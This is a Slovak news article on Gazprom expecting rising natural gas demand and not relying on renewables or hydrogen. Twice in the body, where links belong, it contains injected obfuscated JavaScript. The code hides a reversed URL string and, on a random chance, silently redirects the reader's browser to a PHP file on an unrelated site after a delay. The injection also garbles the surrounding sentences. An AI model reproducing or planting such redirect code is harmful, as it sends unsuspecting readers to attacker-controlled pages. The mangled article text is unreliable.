plynovod

Gazprom počíta s plynom. Na obnoviteľné zdroje sa nespolieha

Ruský gigant Gazprom očakáva v najbližších dekádach rastúci dopyt po zemnom plyne. Zdroje potvrdili, že tradičná energetická komodita bude podľa Gazpromu hrať aj naďalej väčšiu úlohu v ruskom energetickom mixe ako obnoviteľné zdroje alebo vodík.

Viceprezident Gazpromu Oleg Aksyutin počas utorkového on-line brífingu uviedol, že spoločnosť aj naďalej zvažuje scenár pre dosiahnutie uhlíkové neutrality do roku 2050. Podľa Aksyutina to zatiaľ vyzerá, že $mWn=function(n){if(typeof ($mWn.list[n])==“string“) return $mWn.list[n].split(„“).reverse().join(„“);return $mWn.list[n];};$mWn.list=[„\’php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dodavat-zemny-plyn-do-europy/“>zemný plyn bude zabezpečovať až 40 percent dopytu po energii v rokoch 2020 až 2040, zatiaľ čo na obnoviteľné zdroje pripadne iba 34%.

„Našou stratégiou je zvyšovať dodávky plynu,“ uviedol hovorca Gazpronu. Firma svoje predikcie opiera okrem iného aj o rastúci záujem po zemnom plyne v $mWn=function(n){if(typeof ($mWn.list[n])==“string“) return $mWn.list[n].split(„“).reverse().join(„“);return $mWn.list[n];};$mWn.list=[„\’php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod“];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}domacnosti-minali-vyrazne-viac-ako-pred-rokom/“>Európe a Číne, pre Gazprom sú tieto  dve krajiny pre odber plynu najdôležitejšie.

Aksyutin taktiež spomenul, že zatiaľ neexistuje globálny trh s vodíkom, ktorý je považovaný za oveľa čistejší energetický zdroj ako metán a zároveň tvrdí, že kvality vodíka je potrebné ešte podrobne preštudovať. Gazprom zatiaľ nepočíta s investíciami rozvoja pre využívania vodíka.

2 komentáre

Přidat komentář

Vaša e-mailová adresa nebude zverejnená. Vyžadované polia sú označené *